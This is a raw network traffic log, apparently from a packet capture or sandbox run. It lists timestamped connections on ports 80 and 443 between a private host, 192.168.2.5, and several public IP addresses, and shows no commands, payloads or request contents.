Nov 12, 2024 00:06:27.307008028 CET	49758	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:27.307018995 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:27.307025909 CET	49758	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:27.307029963 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:27.307043076 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:27.307054043 CET	49758	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:27.307055950 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:27.307069063 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:27.307080030 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:27.307080030 CET	49758	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:27.307092905 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:27.307099104 CET	49758	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:27.307105064 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:27.307116985 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:27.307123899 CET	49758	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:27.307128906 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:27.307142019 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:27.307151079 CET	49758	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:27.307152987 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:27.307167053 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:27.307174921 CET	49758	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:27.307195902 CET	49758	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:27.307219028 CET	49758	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:27.318994999 CET	49840	443	192.168.2.5	108.139.47.33
Nov 12, 2024 00:06:27.326845884 CET	443	49832	13.107.246.45	192.168.2.5
Nov 12, 2024 00:06:27.326910973 CET	443	49832	13.107.246.45	192.168.2.5
Nov 12, 2024 00:06:27.326965094 CET	49832	443	192.168.2.5	13.107.246.45
Nov 12, 2024 00:06:27.327394962 CET	49832	443	192.168.2.5	13.107.246.45
Nov 12, 2024 00:06:27.327420950 CET	443	49832	13.107.246.45	192.168.2.5
Nov 12, 2024 00:06:27.327457905 CET	49832	443	192.168.2.5	13.107.246.45
Nov 12, 2024 00:06:27.327466011 CET	443	49832	13.107.246.45	192.168.2.5
Nov 12, 2024 00:06:27.328933954 CET	443	49835	13.107.246.45	192.168.2.5
Nov 12, 2024 00:06:27.328986883 CET	443	49834	13.107.246.45	192.168.2.5
Nov 12, 2024 00:06:27.328989983 CET	443	49835	13.107.246.45	192.168.2.5
Nov 12, 2024 00:06:27.329046965 CET	443	49834	13.107.246.45	192.168.2.5
Nov 12, 2024 00:06:27.329051971 CET	49835	443	192.168.2.5	13.107.246.45
Nov 12, 2024 00:06:27.329088926 CET	49834	443	192.168.2.5	13.107.246.45
Nov 12, 2024 00:06:27.329246044 CET	49834	443	192.168.2.5	13.107.246.45
Nov 12, 2024 00:06:27.329253912 CET	443	49834	13.107.246.45	192.168.2.5
Nov 12, 2024 00:06:27.329266071 CET	49834	443	192.168.2.5	13.107.246.45
Nov 12, 2024 00:06:27.329271078 CET	443	49834	13.107.246.45	192.168.2.5
Nov 12, 2024 00:06:27.329293966 CET	49835	443	192.168.2.5	13.107.246.45
Nov 12, 2024 00:06:27.329308033 CET	443	49835	13.107.246.45	192.168.2.5
Nov 12, 2024 00:06:27.329318047 CET	49835	443	192.168.2.5	13.107.246.45
Nov 12, 2024 00:06:27.329324007 CET	443	49835	13.107.246.45	192.168.2.5
Nov 12, 2024 00:06:27.329339981 CET	443	49836	13.107.246.45	192.168.2.5
Nov 12, 2024 00:06:27.329469919 CET	443	49836	13.107.246.45	192.168.2.5
Nov 12, 2024 00:06:27.329520941 CET	49836	443	192.168.2.5	13.107.246.45
Nov 12, 2024 00:06:27.331329107 CET	443	49839	20.110.205.119	192.168.2.5
Nov 12, 2024 00:06:27.331330061 CET	49851	443	192.168.2.5	13.107.246.45
Nov 12, 2024 00:06:27.331363916 CET	443	49851	13.107.246.45	192.168.2.5
Nov 12, 2024 00:06:27.331427097 CET	49851	443	192.168.2.5	13.107.246.45
Nov 12, 2024 00:06:27.331682920 CET	49836	443	192.168.2.5	13.107.246.45
Nov 12, 2024 00:06:27.331682920 CET	49836	443	192.168.2.5	13.107.246.45
Nov 12, 2024 00:06:27.331701040 CET	443	49836	13.107.246.45	192.168.2.5
Nov 12, 2024 00:06:27.331710100 CET	443	49836	13.107.246.45	192.168.2.5
Nov 12, 2024 00:06:27.332298994 CET	49851	443	192.168.2.5	13.107.246.45
Nov 12, 2024 00:06:27.332305908 CET	443	49851	13.107.246.45	192.168.2.5
Nov 12, 2024 00:06:27.333765030 CET	49852	443	192.168.2.5	13.107.246.45
Nov 12, 2024 00:06:27.333796978 CET	443	49852	13.107.246.45	192.168.2.5
Nov 12, 2024 00:06:27.333960056 CET	49852	443	192.168.2.5	13.107.246.45
Nov 12, 2024 00:06:27.335155010 CET	49853	443	192.168.2.5	13.107.246.45
Nov 12, 2024 00:06:27.335189104 CET	443	49853	13.107.246.45	192.168.2.5
Nov 12, 2024 00:06:27.335201025 CET	49854	443	192.168.2.5	13.107.246.45
Nov 12, 2024 00:06:27.335210085 CET	443	49854	13.107.246.45	192.168.2.5
Nov 12, 2024 00:06:27.335241079 CET	49853	443	192.168.2.5	13.107.246.45
Nov 12, 2024 00:06:27.335299969 CET	49854	443	192.168.2.5	13.107.246.45
Nov 12, 2024 00:06:27.335366964 CET	49852	443	192.168.2.5	13.107.246.45
Nov 12, 2024 00:06:27.335380077 CET	443	49852	13.107.246.45	192.168.2.5
Nov 12, 2024 00:06:27.335381985 CET	49853	443	192.168.2.5	13.107.246.45
Nov 12, 2024 00:06:27.335402966 CET	443	49853	13.107.246.45	192.168.2.5
Nov 12, 2024 00:06:27.335820913 CET	49854	443	192.168.2.5	13.107.246.45
Nov 12, 2024 00:06:27.335832119 CET	443	49854	13.107.246.45	192.168.2.5
Nov 12, 2024 00:06:27.336432934 CET	443	49833	13.107.246.45	192.168.2.5
Nov 12, 2024 00:06:27.336601973 CET	443	49833	13.107.246.45	192.168.2.5
Nov 12, 2024 00:06:27.336654902 CET	49833	443	192.168.2.5	13.107.246.45
Nov 12, 2024 00:06:27.336807966 CET	49833	443	192.168.2.5	13.107.246.45
Nov 12, 2024 00:06:27.336817026 CET	443	49833	13.107.246.45	192.168.2.5
Nov 12, 2024 00:06:27.339351892 CET	49855	443	192.168.2.5	13.107.246.45
Nov 12, 2024 00:06:27.339373112 CET	443	49855	13.107.246.45	192.168.2.5
Nov 12, 2024 00:06:27.339449883 CET	49855	443	192.168.2.5	13.107.246.45
Nov 12, 2024 00:06:27.339593887 CET	49855	443	192.168.2.5	13.107.246.45
Nov 12, 2024 00:06:27.339607954 CET	443	49855	13.107.246.45	192.168.2.5
Nov 12, 2024 00:06:27.350824118 CET	443	49840	108.139.47.33	192.168.2.5
Nov 12, 2024 00:06:27.350891113 CET	443	49840	108.139.47.33	192.168.2.5
Nov 12, 2024 00:06:27.350939035 CET	49840	443	192.168.2.5	108.139.47.33
Nov 12, 2024 00:06:27.351919889 CET	49840	443	192.168.2.5	108.139.47.33
Nov 12, 2024 00:06:27.351927042 CET	443	49840	108.139.47.33	192.168.2.5
Nov 12, 2024 00:06:27.354079008 CET	49856	443	192.168.2.5	108.139.47.33
Nov 12, 2024 00:06:27.354104042 CET	443	49856	108.139.47.33	192.168.2.5
Nov 12, 2024 00:06:27.354170084 CET	49856	443	192.168.2.5	108.139.47.33
Nov 12, 2024 00:06:27.354372025 CET	49856	443	192.168.2.5	108.139.47.33
Nov 12, 2024 00:06:27.354388952 CET	443	49856	108.139.47.33	192.168.2.5
Nov 12, 2024 00:06:27.355298996 CET	49758	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:27.355958939 CET	443	49837	142.251.40.129	192.168.2.5
Nov 12, 2024 00:06:27.356000900 CET	443	49837	142.251.40.129	192.168.2.5
Nov 12, 2024 00:06:27.356015921 CET	49837	443	192.168.2.5	142.251.40.129
Nov 12, 2024 00:06:27.356041908 CET	443	49837	142.251.40.129	192.168.2.5
Nov 12, 2024 00:06:27.356085062 CET	443	49837	142.251.40.129	192.168.2.5
Nov 12, 2024 00:06:27.356086016 CET	49837	443	192.168.2.5	142.251.40.129
Nov 12, 2024 00:06:27.356100082 CET	443	49837	142.251.40.129	192.168.2.5
Nov 12, 2024 00:06:27.356138945 CET	49837	443	192.168.2.5	142.251.40.129
Nov 12, 2024 00:06:27.356152058 CET	443	49837	142.251.40.129	192.168.2.5
Nov 12, 2024 00:06:27.356184959 CET	443	49837	142.251.40.129	192.168.2.5
Nov 12, 2024 00:06:27.356214046 CET	443	49837	142.251.40.129	192.168.2.5
Nov 12, 2024 00:06:27.356220961 CET	49837	443	192.168.2.5	142.251.40.129
Nov 12, 2024 00:06:27.356229067 CET	443	49837	142.251.40.129	192.168.2.5
Nov 12, 2024 00:06:27.356334925 CET	49837	443	192.168.2.5	142.251.40.129
Nov 12, 2024 00:06:27.356508970 CET	443	49837	142.251.40.129	192.168.2.5
Nov 12, 2024 00:06:27.356569052 CET	443	49837	142.251.40.129	192.168.2.5
Nov 12, 2024 00:06:27.356605053 CET	443	49837	142.251.40.129	192.168.2.5
Nov 12, 2024 00:06:27.356650114 CET	49837	443	192.168.2.5	142.251.40.129
Nov 12, 2024 00:06:27.356662989 CET	443	49837	142.251.40.129	192.168.2.5
Nov 12, 2024 00:06:27.356700897 CET	49837	443	192.168.2.5	142.251.40.129
Nov 12, 2024 00:06:27.356940031 CET	443	49837	142.251.40.129	192.168.2.5
Nov 12, 2024 00:06:27.356997967 CET	443	49837	142.251.40.129	192.168.2.5
Nov 12, 2024 00:06:27.357032061 CET	443	49837	142.251.40.129	192.168.2.5
Nov 12, 2024 00:06:27.357069969 CET	49837	443	192.168.2.5	142.251.40.129
Nov 12, 2024 00:06:27.357080936 CET	443	49837	142.251.40.129	192.168.2.5
Nov 12, 2024 00:06:27.357134104 CET	49837	443	192.168.2.5	142.251.40.129
Nov 12, 2024 00:06:27.357511044 CET	443	49837	142.251.40.129	192.168.2.5
Nov 12, 2024 00:06:27.357605934 CET	443	49837	142.251.40.129	192.168.2.5
Nov 12, 2024 00:06:27.357642889 CET	443	49837	142.251.40.129	192.168.2.5
Nov 12, 2024 00:06:27.357719898 CET	443	49837	142.251.40.129	192.168.2.5
Nov 12, 2024 00:06:27.357745886 CET	49837	443	192.168.2.5	142.251.40.129
Nov 12, 2024 00:06:27.357754946 CET	443	49837	142.251.40.129	192.168.2.5
Nov 12, 2024 00:06:27.357785940 CET	49837	443	192.168.2.5	142.251.40.129
Nov 12, 2024 00:06:27.357795000 CET	443	49837	142.251.40.129	192.168.2.5
Nov 12, 2024 00:06:27.357826948 CET	443	49837	142.251.40.129	192.168.2.5
Nov 12, 2024 00:06:27.357834101 CET	49837	443	192.168.2.5	142.251.40.129
Nov 12, 2024 00:06:27.357841015 CET	443	49837	142.251.40.129	192.168.2.5
Nov 12, 2024 00:06:27.357909918 CET	49837	443	192.168.2.5	142.251.40.129
Nov 12, 2024 00:06:27.357916117 CET	443	49837	142.251.40.129	192.168.2.5
Nov 12, 2024 00:06:27.358514071 CET	443	49837	142.251.40.129	192.168.2.5
Nov 12, 2024 00:06:27.358550072 CET	443	49837	142.251.40.129	192.168.2.5
Nov 12, 2024 00:06:27.358577967 CET	49837	443	192.168.2.5	142.251.40.129
Nov 12, 2024 00:06:27.358582973 CET	443	49837	142.251.40.129	192.168.2.5
Nov 12, 2024 00:06:27.358592033 CET	443	49837	142.251.40.129	192.168.2.5
Nov 12, 2024 00:06:27.358623981 CET	49837	443	192.168.2.5	142.251.40.129
Nov 12, 2024 00:06:27.358633995 CET	443	49837	142.251.40.129	192.168.2.5
Nov 12, 2024 00:06:27.358675003 CET	49837	443	192.168.2.5	142.251.40.129
Nov 12, 2024 00:06:27.358680964 CET	443	49837	142.251.40.129	192.168.2.5
Nov 12, 2024 00:06:27.358709097 CET	443	49837	142.251.40.129	192.168.2.5
Nov 12, 2024 00:06:27.358767986 CET	49837	443	192.168.2.5	142.251.40.129
Nov 12, 2024 00:06:27.358774900 CET	443	49837	142.251.40.129	192.168.2.5
Nov 12, 2024 00:06:27.360104084 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:27.360759974 CET	443	49837	142.251.40.129	192.168.2.5
Nov 12, 2024 00:06:27.360814095 CET	49837	443	192.168.2.5	142.251.40.129
Nov 12, 2024 00:06:27.360821962 CET	443	49837	142.251.40.129	192.168.2.5
Nov 12, 2024 00:06:27.367646933 CET	443	49842	13.107.246.40	192.168.2.5
Nov 12, 2024 00:06:27.367835999 CET	49842	443	192.168.2.5	13.107.246.40
Nov 12, 2024 00:06:27.367846012 CET	443	49842	13.107.246.40	192.168.2.5
Nov 12, 2024 00:06:27.368887901 CET	443	49842	13.107.246.40	192.168.2.5
Nov 12, 2024 00:06:27.368943930 CET	49842	443	192.168.2.5	13.107.246.40
Nov 12, 2024 00:06:27.369910002 CET	49842	443	192.168.2.5	13.107.246.40
Nov 12, 2024 00:06:27.369970083 CET	443	49842	13.107.246.40	192.168.2.5
Nov 12, 2024 00:06:27.370081902 CET	49842	443	192.168.2.5	13.107.246.40
Nov 12, 2024 00:06:27.370095968 CET	443	49842	13.107.246.40	192.168.2.5
Nov 12, 2024 00:06:27.371833086 CET	443	49841	20.75.60.91	192.168.2.5
Nov 12, 2024 00:06:27.372042894 CET	49841	443	192.168.2.5	20.75.60.91
Nov 12, 2024 00:06:27.372066021 CET	443	49841	20.75.60.91	192.168.2.5
Nov 12, 2024 00:06:27.373157024 CET	443	49841	20.75.60.91	192.168.2.5
Nov 12, 2024 00:06:27.373220921 CET	49841	443	192.168.2.5	20.75.60.91
Nov 12, 2024 00:06:27.374058008 CET	49841	443	192.168.2.5	20.75.60.91
Nov 12, 2024 00:06:27.374123096 CET	443	49841	20.75.60.91	192.168.2.5
Nov 12, 2024 00:06:27.374349117 CET	49841	443	192.168.2.5	20.75.60.91
Nov 12, 2024 00:06:27.374356031 CET	443	49841	20.75.60.91	192.168.2.5
Nov 12, 2024 00:06:27.396570921 CET	443	49839	20.110.205.119	192.168.2.5
Nov 12, 2024 00:06:27.396625996 CET	49839	443	192.168.2.5	20.110.205.119
Nov 12, 2024 00:06:27.398416042 CET	49839	443	192.168.2.5	20.110.205.119
Nov 12, 2024 00:06:27.398436069 CET	443	49839	20.110.205.119	192.168.2.5
Nov 12, 2024 00:06:27.412764072 CET	49837	443	192.168.2.5	142.251.40.129
Nov 12, 2024 00:06:27.428347111 CET	49842	443	192.168.2.5	13.107.246.40
Nov 12, 2024 00:06:27.437244892 CET	443	49837	142.251.40.129	192.168.2.5
Nov 12, 2024 00:06:27.437454939 CET	443	49837	142.251.40.129	192.168.2.5
Nov 12, 2024 00:06:27.437486887 CET	443	49837	142.251.40.129	192.168.2.5
Nov 12, 2024 00:06:27.437499046 CET	49837	443	192.168.2.5	142.251.40.129
Nov 12, 2024 00:06:27.437536001 CET	443	49837	142.251.40.129	192.168.2.5
Nov 12, 2024 00:06:27.437572956 CET	443	49837	142.251.40.129	192.168.2.5
Nov 12, 2024 00:06:27.437609911 CET	443	49837	142.251.40.129	192.168.2.5
Nov 12, 2024 00:06:27.437619925 CET	49837	443	192.168.2.5	142.251.40.129
Nov 12, 2024 00:06:27.437628984 CET	443	49837	142.251.40.129	192.168.2.5
Nov 12, 2024 00:06:27.437652111 CET	49837	443	192.168.2.5	142.251.40.129
Nov 12, 2024 00:06:27.437670946 CET	443	49837	142.251.40.129	192.168.2.5
Nov 12, 2024 00:06:27.437709093 CET	443	49837	142.251.40.129	192.168.2.5
Nov 12, 2024 00:06:27.437740088 CET	443	49837	142.251.40.129	192.168.2.5
Nov 12, 2024 00:06:27.437741041 CET	49837	443	192.168.2.5	142.251.40.129
Nov 12, 2024 00:06:27.437751055 CET	443	49837	142.251.40.129	192.168.2.5
Nov 12, 2024 00:06:27.437777996 CET	49837	443	192.168.2.5	142.251.40.129
Nov 12, 2024 00:06:27.437810898 CET	443	49837	142.251.40.129	192.168.2.5
Nov 12, 2024 00:06:27.437845945 CET	443	49837	142.251.40.129	192.168.2.5
Nov 12, 2024 00:06:27.437848091 CET	49837	443	192.168.2.5	142.251.40.129
Nov 12, 2024 00:06:27.437855005 CET	443	49837	142.251.40.129	192.168.2.5
Nov 12, 2024 00:06:27.437896013 CET	49837	443	192.168.2.5	142.251.40.129
Nov 12, 2024 00:06:27.437906027 CET	443	49837	142.251.40.129	192.168.2.5
Nov 12, 2024 00:06:27.437936068 CET	443	49837	142.251.40.129	192.168.2.5
Nov 12, 2024 00:06:27.437969923 CET	443	49837	142.251.40.129	192.168.2.5
Nov 12, 2024 00:06:27.437978983 CET	49837	443	192.168.2.5	142.251.40.129
Nov 12, 2024 00:06:27.437984943 CET	443	49837	142.251.40.129	192.168.2.5
Nov 12, 2024 00:06:27.438025951 CET	49837	443	192.168.2.5	142.251.40.129
Nov 12, 2024 00:06:27.438025951 CET	443	49837	142.251.40.129	192.168.2.5
Nov 12, 2024 00:06:27.438035965 CET	443	49837	142.251.40.129	192.168.2.5
Nov 12, 2024 00:06:27.438096046 CET	443	49837	142.251.40.129	192.168.2.5
Nov 12, 2024 00:06:27.438121080 CET	49837	443	192.168.2.5	142.251.40.129
Nov 12, 2024 00:06:27.438127995 CET	443	49837	142.251.40.129	192.168.2.5
Nov 12, 2024 00:06:27.438163996 CET	443	49837	142.251.40.129	192.168.2.5
Nov 12, 2024 00:06:27.438169003 CET	49837	443	192.168.2.5	142.251.40.129
Nov 12, 2024 00:06:27.438186884 CET	443	49837	142.251.40.129	192.168.2.5
Nov 12, 2024 00:06:27.438230991 CET	49837	443	192.168.2.5	142.251.40.129
Nov 12, 2024 00:06:27.438261986 CET	443	49837	142.251.40.129	192.168.2.5
Nov 12, 2024 00:06:27.438294888 CET	443	49837	142.251.40.129	192.168.2.5
Nov 12, 2024 00:06:27.438325882 CET	443	49837	142.251.40.129	192.168.2.5
Nov 12, 2024 00:06:27.438330889 CET	49837	443	192.168.2.5	142.251.40.129
Nov 12, 2024 00:06:27.438338041 CET	443	49837	142.251.40.129	192.168.2.5
Nov 12, 2024 00:06:27.438380957 CET	49837	443	192.168.2.5	142.251.40.129
Nov 12, 2024 00:06:27.438388109 CET	443	49837	142.251.40.129	192.168.2.5
Nov 12, 2024 00:06:27.438421011 CET	443	49837	142.251.40.129	192.168.2.5
Nov 12, 2024 00:06:27.438452005 CET	443	49837	142.251.40.129	192.168.2.5
Nov 12, 2024 00:06:27.438462973 CET	49837	443	192.168.2.5	142.251.40.129
Nov 12, 2024 00:06:27.438468933 CET	443	49837	142.251.40.129	192.168.2.5
Nov 12, 2024 00:06:27.438507080 CET	49837	443	192.168.2.5	142.251.40.129
Nov 12, 2024 00:06:27.438508034 CET	443	49837	142.251.40.129	192.168.2.5
Nov 12, 2024 00:06:27.438518047 CET	443	49837	142.251.40.129	192.168.2.5
Nov 12, 2024 00:06:27.438549995 CET	49837	443	192.168.2.5	142.251.40.129
Nov 12, 2024 00:06:27.438555956 CET	443	49837	142.251.40.129	192.168.2.5
Nov 12, 2024 00:06:27.438678026 CET	443	49837	142.251.40.129	192.168.2.5
Nov 12, 2024 00:06:27.438707113 CET	443	49837	142.251.40.129	192.168.2.5
Nov 12, 2024 00:06:27.438743114 CET	443	49837	142.251.40.129	192.168.2.5
Nov 12, 2024 00:06:27.438745975 CET	49837	443	192.168.2.5	142.251.40.129
Nov 12, 2024 00:06:27.438752890 CET	443	49837	142.251.40.129	192.168.2.5
Nov 12, 2024 00:06:27.438786983 CET	49837	443	192.168.2.5	142.251.40.129
Nov 12, 2024 00:06:27.438792944 CET	443	49837	142.251.40.129	192.168.2.5
Nov 12, 2024 00:06:27.438828945 CET	49837	443	192.168.2.5	142.251.40.129
Nov 12, 2024 00:06:27.438834906 CET	443	49837	142.251.40.129	192.168.2.5
Nov 12, 2024 00:06:27.438886881 CET	443	49837	142.251.40.129	192.168.2.5
Nov 12, 2024 00:06:27.438915014 CET	443	49837	142.251.40.129	192.168.2.5
Nov 12, 2024 00:06:27.438925028 CET	49837	443	192.168.2.5	142.251.40.129
Nov 12, 2024 00:06:27.438934088 CET	443	49837	142.251.40.129	192.168.2.5
Nov 12, 2024 00:06:27.438976049 CET	49837	443	192.168.2.5	142.251.40.129
Nov 12, 2024 00:06:27.438982010 CET	443	49837	142.251.40.129	192.168.2.5
Nov 12, 2024 00:06:27.439008951 CET	443	49837	142.251.40.129	192.168.2.5
Nov 12, 2024 00:06:27.439052105 CET	49837	443	192.168.2.5	142.251.40.129
Nov 12, 2024 00:06:27.439060926 CET	443	49837	142.251.40.129	192.168.2.5
Nov 12, 2024 00:06:27.470491886 CET	443	49838	20.189.173.13	192.168.2.5
Nov 12, 2024 00:06:27.470711946 CET	49838	443	192.168.2.5	20.189.173.13
Nov 12, 2024 00:06:27.470745087 CET	443	49838	20.189.173.13	192.168.2.5
Nov 12, 2024 00:06:27.471916914 CET	443	49838	20.189.173.13	192.168.2.5
Nov 12, 2024 00:06:27.471971035 CET	49838	443	192.168.2.5	20.189.173.13
Nov 12, 2024 00:06:27.473104954 CET	49838	443	192.168.2.5	20.189.173.13
Nov 12, 2024 00:06:27.473181009 CET	443	49838	20.189.173.13	192.168.2.5
Nov 12, 2024 00:06:27.473285913 CET	49838	443	192.168.2.5	20.189.173.13
Nov 12, 2024 00:06:27.473294020 CET	443	49838	20.189.173.13	192.168.2.5
Nov 12, 2024 00:06:27.473332882 CET	49838	443	192.168.2.5	20.189.173.13
Nov 12, 2024 00:06:27.473431110 CET	443	49838	20.189.173.13	192.168.2.5
Nov 12, 2024 00:06:27.513917923 CET	443	49841	20.75.60.91	192.168.2.5
Nov 12, 2024 00:06:27.513978958 CET	49841	443	192.168.2.5	20.75.60.91
Nov 12, 2024 00:06:27.516720057 CET	49841	443	192.168.2.5	20.75.60.91
Nov 12, 2024 00:06:27.516740084 CET	443	49841	20.75.60.91	192.168.2.5
Nov 12, 2024 00:06:27.518073082 CET	443	49837	142.251.40.129	192.168.2.5
Nov 12, 2024 00:06:27.518146038 CET	49837	443	192.168.2.5	142.251.40.129
Nov 12, 2024 00:06:27.518179893 CET	443	49837	142.251.40.129	192.168.2.5
Nov 12, 2024 00:06:27.518397093 CET	443	49837	142.251.40.129	192.168.2.5
Nov 12, 2024 00:06:27.518455982 CET	49837	443	192.168.2.5	142.251.40.129
Nov 12, 2024 00:06:27.521770954 CET	49837	443	192.168.2.5	142.251.40.129
Nov 12, 2024 00:06:27.521785975 CET	443	49837	142.251.40.129	192.168.2.5
Nov 12, 2024 00:06:27.528744936 CET	49858	443	192.168.2.5	20.75.60.91
Nov 12, 2024 00:06:27.528780937 CET	443	49858	20.75.60.91	192.168.2.5
Nov 12, 2024 00:06:27.528841019 CET	49858	443	192.168.2.5	20.75.60.91
Nov 12, 2024 00:06:27.529093981 CET	49858	443	192.168.2.5	20.75.60.91
Nov 12, 2024 00:06:27.529108047 CET	443	49858	20.75.60.91	192.168.2.5
Nov 12, 2024 00:06:27.536851883 CET	443	49842	13.107.246.40	192.168.2.5
Nov 12, 2024 00:06:27.536875010 CET	443	49842	13.107.246.40	192.168.2.5
Nov 12, 2024 00:06:27.536883116 CET	443	49842	13.107.246.40	192.168.2.5
Nov 12, 2024 00:06:27.536905050 CET	443	49842	13.107.246.40	192.168.2.5
Nov 12, 2024 00:06:27.536917925 CET	443	49842	13.107.246.40	192.168.2.5
Nov 12, 2024 00:06:27.536931038 CET	443	49842	13.107.246.40	192.168.2.5
Nov 12, 2024 00:06:27.536932945 CET	49842	443	192.168.2.5	13.107.246.40
Nov 12, 2024 00:06:27.536952972 CET	49842	443	192.168.2.5	13.107.246.40
Nov 12, 2024 00:06:27.536958933 CET	443	49842	13.107.246.40	192.168.2.5
Nov 12, 2024 00:06:27.536973953 CET	49842	443	192.168.2.5	13.107.246.40
Nov 12, 2024 00:06:27.536998987 CET	49842	443	192.168.2.5	13.107.246.40
Nov 12, 2024 00:06:27.548785925 CET	443	49842	13.107.246.40	192.168.2.5
Nov 12, 2024 00:06:27.548805952 CET	443	49842	13.107.246.40	192.168.2.5
Nov 12, 2024 00:06:27.548858881 CET	49842	443	192.168.2.5	13.107.246.40
Nov 12, 2024 00:06:27.548867941 CET	443	49842	13.107.246.40	192.168.2.5
Nov 12, 2024 00:06:27.548901081 CET	49842	443	192.168.2.5	13.107.246.40
Nov 12, 2024 00:06:27.553931952 CET	49838	443	192.168.2.5	20.189.173.13
Nov 12, 2024 00:06:27.554506063 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:27.554558992 CET	49758	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:27.554594994 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:27.554605007 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:27.554625034 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:27.554641962 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:27.554646015 CET	49758	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:27.554655075 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:27.554666042 CET	49758	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:27.554667950 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:27.554694891 CET	49758	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:27.554723024 CET	49758	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:27.554740906 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:27.554759026 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:27.554770947 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:27.554781914 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:27.554795980 CET	49758	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:27.554800034 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:27.554812908 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:27.554816008 CET	49758	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:27.554825068 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:27.554838896 CET	49758	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:27.554842949 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:27.554858923 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:27.554867983 CET	49758	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:27.554872036 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:27.554883957 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:27.554900885 CET	49758	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:27.554925919 CET	49758	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:27.554928064 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:27.554944038 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:27.554980993 CET	49758	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:27.555008888 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:27.555021048 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:27.555032015 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:27.555047035 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:27.555056095 CET	49758	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:27.555089951 CET	49758	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:27.555247068 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:27.555263996 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:27.555280924 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:27.555286884 CET	49758	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:27.555294037 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:27.555324078 CET	49758	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:27.555325031 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:27.555324078 CET	49758	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:27.555340052 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:27.555356026 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:27.555368900 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:27.555381060 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:27.555383921 CET	49758	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:27.555398941 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:27.555404902 CET	49758	80	192.168.2.5	185.215.113.206
